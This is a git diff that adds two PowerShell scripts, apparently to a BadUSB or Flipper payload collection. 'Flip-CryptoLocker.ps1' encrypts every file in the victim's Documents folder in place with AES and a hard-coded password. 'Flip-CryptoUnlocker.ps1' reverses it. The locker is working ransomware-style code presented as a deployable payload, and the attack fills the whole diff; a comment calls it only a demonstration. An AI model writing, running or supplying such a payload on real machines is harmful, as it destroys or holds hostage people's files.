diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1 b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1 new file mode 100644 index 0000000..602d2c5 --- /dev/null +++ b/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1 @@ -0,0 +1,37 @@ +# Flip-CryptoLocker.ps1 + +function Encrypt-File { + param ( + [Parameter(Mandatory=$true)] + [string]$Path, + + [Parameter(Mandatory=$true)] + [string]$Password + ) + + $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider + $AES.IV = New-Object byte[]($AES.IV.Length) + $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0')) + + $Content = Get-Content -Path $Path -Encoding Byte + $EncryptedContent = $AES.CreateEncryptor().TransformFinalBlock($Content, 0, $Content.Length) + + Set-Content -Path $Path -Value $EncryptedContent -Encoding Byte +} + +# Fixed password for encryption (this is only for demonstration purposes, in a real scenario, you would want to generate or receive a password securely) +$Password = "D3m0P@ssw0rd" + +# Detect the user's documents folder +$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments") + +# Get all the files in the documents folder +$Files = Get-ChildItem -Path $DocumentsFolder -File + +# Encrypt each file +foreach ($File in $Files) { + Encrypt-File -Path $File.FullName -Password $Password + Write-Host "File encrypted: $($File.Name)" +} + +Write-Host "All files in the documents folder have been encrypted!" diff --git a/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 new file mode 100644 index 0000000..d062239 --- /dev/null +++ b/Payloads/Flip-CryptoLocker/Flip-CryptoUnlocker.ps1 @@ -0,0 +1,37 @@ +# Flip-CryptoUnlocker.ps1 + +function Decrypt-File { + param ( + [Parameter(Mandatory=$true)] + [string]$Path, + + [Parameter(Mandatory=$true)] + [string]$Password + ) + + $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider + $AES.IV = New-Object byte[]($AES.IV.Length) + $AES.Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight($AES.Key.Length, '0')) + + $EncryptedContent = Get-Content -Path $Path -Encoding Byte + $DecryptedContent = $AES.CreateDecryptor().TransformFinalBlock($EncryptedContent, 0, $EncryptedContent.Length) + + Set-Content -Path $Path -Value $DecryptedContent -Encoding Byte +} + +# Fixed password for decryption (it should be the same one used for encryption) +$Password = "D3m0P@ssw0rd" + +# Detect the user's documents folder +$DocumentsFolder = [Environment]::GetFolderPath("MyDocuments") + +# Get all the files in the documents folder +$Files = Get-ChildItem -Path $DocumentsFolder -File + +# Decrypt each file +foreach ($File in $Files) { + Decrypt-File -Path $File.FullName -Password $Password + Write-Host "File decrypted: $($File.Name)" +} + +Write-Host "All files in the documents folder have been decrypted!"